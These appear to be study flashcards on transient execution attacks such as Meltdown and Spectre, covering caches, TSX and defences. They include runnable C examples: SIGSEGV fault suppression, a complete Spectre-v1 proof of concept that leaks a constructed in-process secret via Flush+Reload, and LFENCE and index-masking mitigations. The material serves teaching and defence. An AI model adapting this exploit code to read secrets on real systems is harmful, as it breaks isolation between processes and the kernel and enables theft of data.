What is the concept behind Transient Execution Attacks?
The CPU transiently executes instructions (speculatively or out of order) whose results it later discards. In that window, the attacker's code can access data it is not architecturally allowed to read and encode it into microarchitectural state (e.g., the cache). The result is never committed, but a side channel recovers it afterwards.
A key technique to leak secrets across privilege domains
What are Privilege domains?
Modern computers have many security domains (user processes, kernel, hypervisor, virtual machines)
TEAs allow attacks on victims either:
Within the same privilege domain (e.g., process A → process B)
Across privilege domains (e.g., process → kernel)

What are Caches?
Caches store recently accessed memory
Different types of caches (I-Cache vs. D-Cache)
Arranged in a cache hierarchy (L1, L2, shared last-level cache)
Tackle a key performance bottleneck: the latency of accessing DRAM
We can build timing side channels via caches!
If a value is in the cache, a subsequent access will be fast
Otherwise, it will be slow

What are Branch Predictors?
Branch predictors predict whether a branch is taken and, for indirect branches, its target
Key performance optimization in modern CPUs
Different predictor structures for direct and indirect branches (and for returns)
CPU executes the predicted path speculatively
Results are architecturally committed once the prediction turns out to be correct
Otherwise they are discarded (pipeline squash)
Regardless of the outcome, speculative execution leaves traces in the microarchitecture
This includes the cache(!)

What is Out of Order Execution?
Another key performance optimization, next to speculative execution
Hides/minimizes latency (e.g., cache misses, FPU operations, etc.)
Keeps the elements of the execution pipeline busy
Exploits the fact that instructions can be reordered internally as long as the architectural result stays the same
Usually no issue when there are no data dependencies
Results are only committed (architecturally), in program order, once all preceding operations have completed
As with speculative execution, leaves data in the cache(!)

What is Meltdown?
In essence, we just saw Meltdown. Now what if:
1. We can (transiently) dereference an interesting value that is inaccessible to us?
2. We can suppress the architectural failure (the page fault)?
3. We can exfiltrate the value?
All of this turns out to be possible on (older) Intel CPUs:
1. Example: kernel addresses from user space (the loaded value is forwarded to dependent instructions before the permission check takes effect)
2. Use a custom SIGSEGV handler (or other methods, e.g., TSX)
3. Flush+Reload

What are some Common Techniques for Suppressing faults?
Custom segfault handlers
What we just saw
Intel’s Transactional Synchronization Extensions (TSX)
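Added example (not from these cards or from any paper's code): the fault-suppression step with a custom SIGSEGV handler, as a runnable C program. It assumes a Linux/POSIX system, uses a constructed PROT_NONE page as a stand-in for an inaccessible kernel address, and the names probe_array, suppressed_read and demo_fault_suppression are this example's own. The Flush+Reload decoding of probe_array is deliberately left out here.

```c
/* Added example: suppress the architectural fault of an illegal read with a
 * custom SIGSEGV handler, the way a Meltdown proof of concept keeps running
 * after each probe. Assumes Linux/POSIX (sigaction, mmap, MAP_ANONYMOUS). */
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE 4096

/* Probe array for the side channel: one page per possible byte value. */
static uint8_t probe_array[256 * PAGE];
static sigjmp_buf fault_env;
static volatile sig_atomic_t fault_count;

/* SIGSEGV/SIGBUS handler: never return to the faulting instruction (that
 * would fault again); jump back to the sigsetjmp() in suppressed_read(). */
static void fault_handler(int sig) {
    (void)sig;
    fault_count++;
    siglongjmp(fault_env, 1);
}

static void install_fault_handler(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = fault_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);   /* some platforms report the fault as SIGBUS */
}

/* Meltdown steps 1+2 in software: read *addr and encode the byte into
 * probe_array; if the read faults, swallow the fault and keep running.
 * Returns 0 if the read completed architecturally, 1 if it was suppressed. */
static int suppressed_read(const volatile uint8_t *addr) {
    if (sigsetjmp(fault_env, 1) == 0) {
        uint8_t v = *addr;                       /* may fault */
        probe_array[(size_t)v * PAGE] = 1;       /* encode: touch one page */
        return 0;
    }
    return 1;                                    /* arrived here via siglongjmp */
}

/* Constructed stand-in for a kernel address: mapped, but not readable. */
static uint8_t *map_inaccessible_page(void) {
    void *p = mmap(NULL, PAGE, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : (uint8_t *)p;
}

/* Runs one readable and one inaccessible probe; returns the total number of
 * suppressed faults so far, or -1 if something did not behave as expected. */
static int demo_fault_suppression(void) {
    install_fault_handler();
    uint8_t readable = 0x41;
    uint8_t *secret = map_inaccessible_page();
    if (secret == NULL)
        return -1;
    int r_ok = suppressed_read(&readable);       /* expect 0: no fault */
    int r_fault = suppressed_read(secret);       /* expect 1: fault suppressed */
    munmap(secret, PAGE);
    if (r_ok != 0 || r_fault != 1 || probe_array[0x41 * PAGE] != 1)
        return -1;
    return (int)fault_count;
}

int main(void) {
    printf("suppressed faults: %d\n", demo_fault_suppression());
    return 0;
}
```

The handler must leave via siglongjmp rather than return: returning would resume at the faulting load and fault again forever. On a vulnerable (pre-2018) Intel CPU the out-of-order core has already forwarded the byte into the probe_array access before the fault is raised, which is exactly the trace that step 3 (Flush+Reload) decodes; with a signal round trip per probe this is slow, which is why TSX-based suppression (next card) is attractive.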
What is TSX?
Intel’s Transactional Synchronization Extensions
ISA extension for hardware transactional memory
Key idea: allow parallelism via lock elision
Data accesses are bundled in transactions
If a transaction aborts:
Re-execute with the real lock (HLE)
Jump to a custom fallback handler (RTM, given to XBEGIN)
A fault inside a transaction only aborts the transaction; no exception is delivered to the OS, so faults are suppressed far faster than with a signal handler
Now disabled for desktop CPUs, still available on (some) Xeon CPUs
What is Spectre?
Abuses branch (mis)prediction & speculative execution
Accesses sensitive data transiently
Uses a cache side channel to exfiltrate the data
A full class of attacks
New variants are still being discovered
Issues previously thought to be mitigated turn out to be still exploitable
Still an active research topic
What are the steps in the Spectre-v1 (Spectre-PHT) attack?
Attack steps:
1) Train the direct (conditional) branch predictor to take the bounds-check branch, by calling the victim with in-bounds indices
2) Call the victim with x out of bounds (ideally with the bound itself evicted from the cache, so the check resolves late)
This will transiently access the value at array1[x]
And encode it into array2 (e.g., by touching array2[array1[x] * 4096])
3) Exfiltrate the secret via a cache side channel by probing array2
E.g., via FLUSH+RELOAD (not shown in the code snippet)
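Added example (not the code snippet the card refers to, and not taken from any paper): all three Spectre-v1 steps in C, including the Flush+Reload probe that the cards mention under caches and under step 3. Assumptions: an x86-64 gcc/clang build (clflush and rdtscp come from x86intrin.h; on other targets the timing helpers degrade to no-ops and nothing is recovered), a cache-hit threshold of 80 cycles that you should calibrate for your machine, and a constructed in-process secret string reached through an out-of-bounds index into array1. The names victim_function, leak_byte, secret_index and oob_read are this example's own.

```c
/* Added example: Spectre-v1 (bounds check bypass) with a Flush+Reload probe.
 * Assumes x86-64 + gcc/clang; the secret below is a constructed test string. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0
#endif

#define STRIDE 4096                 /* one page per possible byte value */
#define CACHE_HIT_THRESHOLD 80      /* cycles; assumed, calibrate per machine */
#define ROUNDS 100

static uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t array2[256 * STRIDE];
static volatile unsigned int array1_size = 16;
static const char secret[] = "The Magic Words are Squeamish Ossifrage.";  /* constructed */
static volatile uint8_t sink;       /* keeps the loads from being optimized away */

/* Vulnerable gadget (Spectre-v1). Architecturally the bounds check holds;
 * while it is mispredicted, array1[x] is read out of bounds and its value
 * selects which page of array2 gets pulled into the cache. */
static void victim_function(size_t x) {
    if (x < array1_size)
        sink = array2[array1[x] * STRIDE];
}

/* Out-of-bounds index that makes array1[x] alias secret[i]. */
static size_t secret_index(size_t i) {
    return (size_t)((uintptr_t)(secret + i) - (uintptr_t)array1);
}

/* Architectural (non-speculative) view of what the gadget reaches; used to
 * check the index arithmetic, not part of the attack itself. */
static uint8_t oob_read(size_t x) {
    return *(const volatile uint8_t *)((uintptr_t)array1 + x);
}

static inline void flush_line(const void *p) {
#if HAVE_X86_TIMING
    _mm_clflush(p);
#else
    (void)p;
#endif
}

/* Flush+Reload probe: cycles for one access; a cached line is far faster. */
static inline uint64_t timed_access(const volatile uint8_t *p) {
#if HAVE_X86_TIMING
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    sink = *p;
    return UINT64_MAX;              /* no cycle counter: never counts as a hit */
#endif
}

/* Leak the byte at array1[malicious_x]; returns the value hit most often. */
static uint8_t leak_byte(size_t malicious_x) {
    unsigned int hits[256] = {0};
    const size_t training_x = 0;
    for (int round = 0; round < ROUNDS; round++) {
        for (int i = 0; i < 256; i++)               /* step 3 prep: evict all probe pages */
            flush_line(&array2[i * STRIDE]);
        flush_line((const void *)&array1_size);     /* make the bounds check resolve late */
        /* Step 1: five in-bounds calls train the branch "taken".
         * Step 2: the sixth call is out of bounds. The index is selected
         * without a branch so the selection itself cannot be mispredicted. */
        for (int j = 0; j < 6; j++) {
            size_t train_mask = (size_t)(j == 5) - 1;   /* 0 on the 6th call, else ~0 */
            size_t x = (training_x & train_mask) | (malicious_x & ~train_mask);
            victim_function(x);
        }
        /* Step 3: reload every probe page; the page the victim touched is fast.
         * Pseudo-random order keeps the hardware prefetcher out of the way. */
        for (int i = 0; i < 256; i++) {
            int mix = (i * 167 + 13) & 255;
            if (timed_access(&array2[mix * STRIDE]) <= CACHE_HIT_THRESHOLD)
                hits[mix]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (hits[i] > hits[best]) best = i;
    return (uint8_t)best;
}

int main(void) {
    printf("leaked: ");
    for (size_t i = 0; i < strlen(secret); i++) {
        uint8_t b = leak_byte(secret_index(i));
        putchar(b >= 32 && b < 127 ? (int)b : '?');
    }
    putchar('\n');
    return 0;
}
```

Whether a byte actually leaks depends on the CPU, its microcode and the OS mitigations in place, so a wrong guess is more likely a calibration or mitigation effect than a bug in the index arithmetic, which oob_read verifies architecturally. Note the two places where the attacker's own code must avoid branches: the training/attack index selection, and the probe loop order.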
What are some Spectre Variants?
V1: Bounds Check Bypass (BCB)
aka Spectre-PHT (pattern history table)
V2: Branch Target Injection (BTI)
aka Spectre-BTB (branch target buffer)
V3: Rogue Data Cache Load (RDCL)
aka Meltdown
V4: Speculative Store Bypass (SSB)
aka Spectre-STL, one of the "Spectre-NG" batch
No variant number: Return Mispredict
aka Spectre-RSB (return stack buffer)
What can spectre attacks do?
Derandomize KASLR
Read data from other processes
Read data from the kernel
Bypass hardware security features (e.g., Arm PAC)
Read data from virtual machines on the same physical host
More generally: Transient execution attacks break isolation
What was the impact of spectre and meltdown?
Almost every CPU built before 2018 is vulnerable to Spectre attacks
Software & microcode mitigations
Partly with high performance impact
Newer CPUs have hardware mitigations against some variants
Fixing Spectre & Meltdown variants took time
Meltdown is now fully mitigated in hardware
Fixing Spectre completely turned out to be rather difficult
What are some defences against microarchitectural attacks?
Hotfixes and Workarounds
Hardware Defenses
Systematic Defenses
What is the Hotfixes and Workarounds defence?
Intermediate solution after vulnerabilities are found
Implemented by either:
Removing particular gadgets used during attacks
Changes to software (e.g., adding speculation barriers via FENCE instructions such as LFENCE on x86)
Microcode updates (e.g., to disable features or change instruction behavior)
Advantage: fast mitigation of a specific attack vector
Disadvantages: performance overhead & may not fully mitigate attacks
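Added example (not from these cards): the Spectre-v1 gadget beside the two software hotfixes the card describes, a speculation barrier and gadget removal through index masking. Assumptions: x86 for the real LFENCE (on other targets the macro is only a compiler barrier, a stand-in), an LP64 gcc/clang build where right-shifting a negative intptr_t is arithmetic, and constructed array contents so the functions return checkable values. array_index_mask_nospec follows the generic C version used in the Linux kernel; the victim_* and clamp_index_nospec names are this example's own.

```c
/* Added example: a Spectre-v1 gadget and two software hotfixes for it.
 * Assumes x86 for LFENCE and an LP64 gcc/clang build (arithmetic shifts). */
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define speculation_barrier() _mm_lfence()           /* LFENCE: later loads wait for it */
#else
#define speculation_barrier() __asm__ __volatile__("" ::: "memory")  /* stand-in only */
#endif

#define STRIDE 4096
static uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t array2[256 * STRIDE];
static volatile size_t array1_size = 16;

/* Constructed contents so the gadgets return something checkable.
 * Returns the number of probe pages initialised (256). */
static int init_array2(void) {
    for (int i = 0; i < 256; i++)
        array2[i * STRIDE] = (uint8_t)(i * 7);
    return 256;
}

/* Vulnerable gadget: the bounds check is a branch the predictor can get wrong,
 * so array1[x] and the dependent array2 load can run with x out of bounds. */
static uint8_t victim_vulnerable(size_t x) {
    if (x < array1_size)
        return array2[array1[x] * STRIDE];
    return 0;
}

/* Hotfix 1: speculation barrier. The loads after LFENCE cannot issue until
 * the fence retires, which requires the bounds-check branch to be resolved.
 * Cost: a full serialisation of loads at every protected site. */
static uint8_t victim_fenced(size_t x) {
    if (x < array1_size) {
        speculation_barrier();
        return array2[array1[x] * STRIDE];
    }
    return 0;
}

/* Hotfix 2: branchless mask, as in Linux's generic array_index_mask_nospec():
 * all ones if index < size, else zero. (size - 1 - index) is negative exactly
 * when index >= size; the OR also covers index with its top bit set. */
static inline size_t array_index_mask_nospec(size_t index, size_t size) {
    intptr_t v = (intptr_t)(index | (size - 1 - index));
    return (size_t)(~v >> (sizeof(intptr_t) * CHAR_BIT - 1));
}

/* Clamp an index to [0, size) with pure data flow: no branch to mispredict,
 * and an out-of-bounds index becomes 0 even during transient execution. */
static inline size_t clamp_index_nospec(size_t index, size_t size) {
    return index & array_index_mask_nospec(index, size);
}

/* Same gadget with the index clamped. The array1 load now depends on the
 * mask, which depends on the real array1_size value, not on the branch. */
static uint8_t victim_masked(size_t x) {
    if (x < array1_size) {
        x = clamp_index_nospec(x, array1_size);
        return array2[array1[x] * STRIDE];
    }
    return 0;
}

int main(void) {
    init_array2();
    printf("x=3: vulnerable=%u fenced=%u masked=%u\n",
           victim_vulnerable(3), victim_fenced(3), victim_masked(3));
    printf("x=1000 clamps to %zu\n", clamp_index_nospec(1000, 16));
    return 0;
}
```

All three variants are identical architecturally (the in-bounds results match); they differ only in what the out-of-order core can do while the branch is unresolved. Masking is the cheaper hotfix, which is why the Linux kernel applies it at user-controlled array indices, but it has to be placed at every gadget by hand, which is the "may not fully mitigate" caveat above.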
What are Hardware Defenses?
Take time to develop
The CPU design-release cycle takes multiple years
As user/typical defender, we have no influence over this
Sometimes allow to fully remove a vulnerability
E.g., in-hardware mitigation of Meltdown: the privilege check is enforced before the loaded value is forwarded to dependent (transient) instructions
May not be complete (for performance reasons)
E.g., eIBRS against Spectre-BTB, later bypassed via Spectre-BHI*
What are Systematic Defenses?
Less used in practice:
Often high performance overhead
Major changes to software needed
But some examples:
Secret-Free Hypervisor*
Keeps secrets out of the hypervisor's address space, so leaking from the hypervisor yields nothing useful
Quarantine**
Isolating security domains on different cores
Undocumented defenses by cloud vendors
E.g., AWS
What is Transient Execution and how can attackers abuse this?
Transient execution is the execution of instructions whose results are later discarded (e.g., after a mispredicted branch or a faulting load). Even though the results are not used architecturally, it changes the microarchitectural state and leaves traces there, e.g., in the cache.
Attackers can abuse this to leak information across privilege domains via side channels.